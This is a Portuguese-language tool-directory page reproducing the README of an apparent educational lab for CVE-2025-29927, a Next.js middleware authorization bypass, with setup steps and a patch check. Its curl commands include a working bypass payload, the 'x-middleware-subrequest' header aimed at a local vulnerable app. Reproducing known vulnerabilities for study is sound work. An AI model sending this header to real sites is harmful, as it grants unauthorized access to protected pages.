Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-29927-lab — Laboratório de reprodução para CVE-2025-29927 — bypass de autorização do middleware do Next.js (CVSS 9.1) | Kitploit
Ferramentas/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
Análise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoLabs e Prática
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

Laboratório de reprodução para CVE-2025-29927 — bypass de autorização do middleware do Next.js (CVSS 9.1)

Ver Repositório
47há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29927 Lab

Laboratório de reprodução mínima para CVE-2025-29927 — bypass de autorização do middleware do Next.js (CVSS 9.1).

Material complementar: Análise N-Day publicada no Medium

O que é isso

Um aplicativo Next.js 15.2.2 (vulnerável) com uma rota /dashboard protegida por cookie. A verificação de autenticação do middleware pode ser ignorada enviando um único cabeçalho HTTP — nenhuma credencial é necessária.

Requisitos

  • Node.js 18+

Configuração

git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

Reproduzir o bypass

Passo 1 — Confirme que o middleware bloqueia requisições não autenticadas:

curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

Passo 2 — Ignore o middleware com o cabeçalho de subrequest:

curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

Passo 3 — Atualize para a versão corrigida e confirme que o bypass está bloqueado:

npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

Rotas do aplicativo

RotaAcesso
/Público
/loginPúblico
/dashboardProtegida pelo middleware (requer cookie de session)

Versões afetadas

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

Referências

  • NVD — CVE-2025-29927
  • Patch do Next.js — PR #77201
  • Código-fonte vulnerável — sandbox.ts
Baixar ferramenta